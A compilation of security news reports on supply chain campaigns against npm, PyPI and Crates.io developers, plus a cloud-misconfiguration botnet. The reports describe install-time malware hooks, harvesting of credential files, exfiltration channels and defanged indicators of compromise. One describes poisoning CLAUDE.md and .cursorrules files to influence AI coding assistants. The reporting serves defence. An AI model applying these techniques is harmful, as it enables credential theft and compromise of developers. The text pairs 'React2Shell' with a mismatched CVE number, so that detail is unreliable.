Large-Scale "TrapDoor" Supply Chain Attack Targets Developers Across npm, PyPI, and Crates.io A sophisticated supply chain attack, dubbed “TrapDoor,” is actively targeting developers by abusing open-source ecosystems to steal sensitive data. The campaign spans npm, PyPI, and Crates.io, deploying 34 malicious packages across 384 versions to compromise systems in cryptocurrency, DeFi, AI, and cloud environments. Attackers exploit legitimate package installation and build mechanisms such as npm’s postinstall scripts, Python’s import behavior, and Rust’s build.rs to execute malicious code automatically during installation or project builds, requiring no user interaction. The malware harvests SSH keys, cloud credentials, API tokens, and cryptocurrency wallets, exfiltrating data through trusted platforms like GitHub Pages, raw.githubusercontent.com, and webhook.site to evade detection. ### Key Malicious Packages & Tactics - Python (PyPI): *git-config-sync* - Executes malicious code upon import, scanning directories (`.ssh`, `.aws`, `.docker`, `.kube`) for credentials using regex patterns. - Disables TLS verification to intercept traffic, sending stolen data to attacker-controlled GitHub Pages endpoints. - npm: *token-usage-tracker* - The most advanced variant, running a background process to collect browser credentials, cloud configs, shell histories, and cryptocurrency wallets. - Uses Fernet encryption before exfiltrating data via webhooks or GitHub Gist. - Introduces persistence and propagation by modifying shell configs, injecting Git hooks, and poisoning AI development environments (e.g., `.cursorrules`, `CLAUDE.md`) to influence coding assistants. - Rust (Crates.io): *sui-framework-helpers* - Executes during builds via `build.rs`, targeting blockchain wallet files (Sui, Solana, Aptos). - Uses XOR obfuscation and uploads stolen data to public GitHub Gists. ### Attack Infrastructure & Evasion The campaign leverages whitelisted services (GitHub Pages, webhook.site) to blend malicious traffic with legitimate developer activity. While the npm variant stands out for its persistence, propagation, and remote command execution, all samples follow a consistent pattern: 1. Trigger during install/build. 2. Harvest credentials from local environments. 3. Exfiltrate via trusted channels. ### Indicators of Compromise (IOCs) - Domain: `ddjidd564[.]github[.]io` - URLs: - `https[:]//ddjidd564[.]github[.]io/defi-security-best-practices/config.json` - `https[:]//webhook[.]site/2ada14c8-00f6-43ce-9ad6-f5dc15952246` (and similar webhook endpoints) Security researchers warn the attack underscores the growing sophistication of supply chain threats, with developers in high-value sectors as prime targets.

Solana FakeFix Campaign: Supply-Chain Attack Targets Developers via Malicious npm and PyPI Packages A recently uncovered supply-chain attack, dubbed "Solana FakeFix," has exposed a coordinated effort to steal developer secrets through malicious packages on npm and PyPI. The campaign, identified by JFrog Security Research, involved 20 trojanized packages 16 on npm and 4 on PyPI that impersonated legitimate Solana tooling to harvest sensitive credentials. ### How the Attack Worked The threat actors employed typosquatting and social engineering to trick developers into installing malicious packages. Some packages mimicked well-known Solana libraries, such as: - `@solana-labs/web3.js` (a fake "community fork") - `solana-web3-stable` (posing as a "stable-build" fix) - `solana-mev-bot` (a fake MEV bot prompting users to input private keys) The attacker, operating under the GitHub account PassWord1337, even spammed GitHub issues to promote a drop-in replacement for `@solana/web3.js`, urging users to switch via npm commands. ### Exploitation Techniques - npm Packages: Used postinstall scripts to execute malicious JavaScript during installation. - PyPI Packages: Embedded payloads in `__init__.py` files, triggering data theft upon import. - Targeted Secrets: Stolen data included Solana wallet keys, AWS credentials, SSH keys, .env files, and GitHub tokens, identified by keywords like `KEY`, `SECRET`, `MNEMONIC`, and `AWS`. - Exfiltration: Data was sent to Telegram C2 channels using hardcoded bot tokens. Later variants added interactive backdoor commands (`/keys`, `/ssh`, `/env`, `/sh`) and self-update mechanisms. ### Evolving Threats Early versions were crude backdoors, but later packages bundled legitimate Solana code with hidden malicious payloads, making them harder to detect. One variant even tampered with Solana RPC endpoints to drain funds to attacker-controlled wallets. ### Related Windows Loader Campaign JFrog also uncovered a separate but linked campaign involving five npm packages uploaded by the account thermonuclear. These packages: - Executed PowerShell scripts during installation. - Dropped Deno-based loaders or Windows EXE payloads. - Established Registry Run-key persistence and dynamic C2 communication for payload rotation. ### Impact & Response The attack highlights the risks of unverified dependencies in development pipelines. Organizations are advised to: - Remove affected packages from workstations, CI systems, and caches. - Rotate exposed Solana wallets, SSH keys, and cloud credentials. - Rebuild compromised CI runners from trusted images. - Enforce stricter registry hygiene, including scrutiny of install-time scripts and near-miss package names. The campaign underscores the growing sophistication of supply-chain attacks targeting developers through trusted package registries.

New Linux Malware "Quasar Linux" (QLNX) Targets Developers in Supply Chain Attacks Cybersecurity researchers have identified a highly sophisticated Linux remote access trojan (RAT) dubbed Quasar Linux (QLNX), a previously undocumented malware designed to infiltrate developer and DevOps workstations. The threat actor behind QLNX aims to steal credentials, enabling large-scale supply chain attacks by compromising trusted open-source packages on platforms like npm and PyPI. Unlike conventional malware, QLNX functions as a full-fledged Linux implant, combining remote access, stealth, persistence, and credential harvesting in a single payload. Its minimal detection footprint allows attackers to maintain long-term, undetected access to infected systems. ### How QLNX Operates QLNX employs advanced evasion techniques to avoid detection: - Fileless execution: The malware copies itself into memory, deletes its original file, and re-executes from RAM, leaving no disk-based traces. - Process spoofing: It disguises itself as legitimate kernel threads (e.g., watchdog processes) to blend in with normal system activity. - Environment wiping: The malware erases execution context variables to hinder forensic analysis. ### Credential Harvesting & Supply Chain Risks QLNX’s primary objective is stealing high-value credentials from developer environments. It targets critical configuration files and authentication tokens, including: - `.npmrc`, `.pypirc`, `.git-credentials` - AWS credentials (`~/.aws/credentials`) - Kubernetes configurations (`~/.kube/config`) - Docker Hub logins - Environment variables (`.env`) Additionally, QLNX deploys a malicious PAM (Pluggable Authentication Module) with inline hooking to intercept plaintext passwords during authentication. Stolen credentials are encrypted and hidden in system log directories, allowing attackers to bypass security controls and access cloud infrastructure. A single compromised developer account can enable threat actors to: - Push trojanized updates to millions of users - Pivot through CI/CD pipelines - Establish backdoors in production environments ### Resilient Infrastructure & Detection Challenges QLNX includes a peer-to-peer mesh networking capability, turning infected machines into a resilient botnet. This makes complete eradication across an enterprise difficult, as the malware can persist even if some nodes are cleaned. Security platforms leveraging AI-driven threat hunting recently flagged QLNX, highlighting the limitations of traditional signature-based detection. Given the lack of uniform security controls in developer environments, such implants remain a persistent risk to software supply chains.

Large-Scale Supply Chain Attack Compromises 170+ npm Packages and PyPI Libraries Hackers have executed a sophisticated supply chain attack by infiltrating over 170 npm packages and two PyPI libraries, collectively downloaded more than 200 million times per week. The campaign, attributed to the resurfaced "Shai-Hulud" malware, steals developer and cloud credentials while exhibiting worm-like propagation across development ecosystems. ### Attack Mechanics The malicious npm packages contain a hidden preinstall script that executes during installation, deploying a loader to fetch an obfuscated JavaScript payload. Unlike typical credential stealers, this malware modifies legitimate package code, injects malicious components, and republishes infected versions, turning compromised environments into new attack vectors. The PyPI variant embeds a downloader in the import process, fetching a remote Python payload that targets cloud platforms, local systems, and developer tools. Both variants employ multi-layered obfuscation, including PBKDF2-SHA256 encryption and AES-256 runtime decryption, to evade detection. ### Initial Compromise & Propagation The attack originated from a misconfigured GitHub Actions workflow, where attackers exploited untrusted forked code to execute within a privileged environment. Once inside CI/CD pipelines, the malware extracts GitHub Actions tokens, OIDC identity data, and npm publishing credentials, enabling large-scale package hijacking. ### Credential Theft & Exfiltration The payload targets a broad range of sensitive data, including: - GitHub tokens, Actions secrets, and npm credentials - AWS, GCP, and Azure credentials (via environment variables, files, and metadata services) - Kubernetes service account tokens and HashiCorp Vault secrets - SSH keys, .npmrc files, shell history, and API keys - Password manager data (1Password, Bitwarden) Stolen data is exfiltrated through encrypted uploads to attacker-controlled servers, GitHub repositories, and decentralized networks (e.g., Session/Oxen). A notable indicator is commits authored by "[email protected]." ### Destructive Capabilities The malware includes a "dead-man switch" a persistent service that monitors stolen GitHub tokens. If a token is revoked, the malware may trigger destructive actions, such as wiping the infected system. The PyPI variant can also deploy a second-stage payload capable of deleting entire Linux systems under certain conditions. ### Detection & Response Security researchers at JFrog detected and blocked all malicious packages within 24 hours, but the incident highlights vulnerabilities in CI/CD trust mechanisms. The attack demonstrates how compromised build processes can turn verified pipelines into malware distribution channels, underscoring the need for stricter runtime monitoring and credential hygiene.

Malicious Xinference Versions on PyPI Steal Cloud Credentials and Sensitive Data A supply chain attack targeting the Python package Xinference has exposed users to a sophisticated infostealer malware. Threat actors uploaded malicious versions (2.6.0, 2.6.1, and 2.6.2) to the Python Package Index (PyPI) on April 22, 2026, containing heavily obfuscated code designed to exfiltrate sensitive data. While the malware includes references to TeamPCP in its payload, the group has publicly denied involvement via its X (formerly Twitter) account. The compromised versions execute a base64-encoded payload upon package initialization, harvesting a wide range of credentials and system data, including: - Cloud credentials (AWS, GCP, Kubernetes tokens) - Environment variables and SSH keys - API keys, database passwords, and cryptocurrency wallets (Bitcoin, Ethereum, Monero, etc.) - Shell history, SSL certificates, and service credentials (Slack, Discord, Postfix) - System metadata (IP addresses, usernames, network interfaces) The stolen data is compressed and sent to a command-and-control (C2) server at `https://whereisitat[.]lucyatemysuperbox[.]space/`. The attack was discovered after a user reported suspicious behavior, prompting Xinference developers to confirm the breach. With over 600,000 total downloads, the full scope of affected users remains unclear. The latest safe version of Xinference is 2.5.0 or earlier. The malicious commit was traced to a bot account (XprobeBot), active since October 2025, which inserted the payload into the package’s `__init__.py` file. This incident underscores the growing threat of supply chain attacks, where compromised maintainer accounts or automated bots are increasingly used to distribute malware at scale.

TeamPCP Exploits Cloud Misconfigurations in Large-Scale Cybercrime Operation A threat actor known as TeamPCP (also operating under aliases like PCPcat and ShellForce) is conducting automated, worm-like attacks on misconfigured and exposed cloud management services, compromising at least 60,000 servers worldwide since late December. The group’s campaign primarily targets Azure (60% of attacks), AWS (37%), and Google and Oracle cloud environments, exploiting well-documented vulnerabilities and misconfigurations rather than developing new attack methods. TeamPCP’s operations involve scanning for exposed Docker APIs, Kubernetes clusters, Ray dashboards, and systems with leaked secrets (such as `.env` files). Once inside, the group deploys malicious Python and Shell scripts to install proxies, tunneling software, and persistence mechanisms, effectively converting compromised infrastructure into a self-propagating botnet. A key tool in their arsenal is the React2Shell vulnerability (CVE-2025-29927), which allows remote command execution and data exfiltration. The group monetizes its attacks through multiple revenue streams, including: - Cryptocurrency mining using hijacked compute resources. - Data theft and extortion, with stolen records including personal IDs, employment records, and résumés published on a leak site operated by an affiliate, ShellForce. - Selling access to compromised systems for use as proxies or command-and-control infrastructure. - Ransomware deployment, leveraging infected systems as launchpads for further attacks. Notably, TeamPCP has targeted JobsGO, a Vietnamese recruitment platform, exfiltrating over two million records containing sensitive personal and professional data. Most victims are located in South Korea, Canada, the U.S., Serbia, and the UAE, with stolen information often used for phishing, impersonation, or account takeovers. Despite its sophistication, TeamPCP’s techniques are not novel the group relies on automated exploitation of known vulnerabilities and recycled tooling. Security firm Flare warns that the threat actor’s strength lies in its large-scale automation, turning exposed cloud infrastructure into a distributed criminal ecosystem. The group also maintains a Telegram channel (launched in November, with ~700 members) for updates and reputation-building, though researchers suggest it may have operated under previous aliases. The campaign underscores the risks of unsecured cloud control planes, leaked credentials, and poor access controls, as TeamPCP continues to industrialize existing attack vectors with alarming efficiency.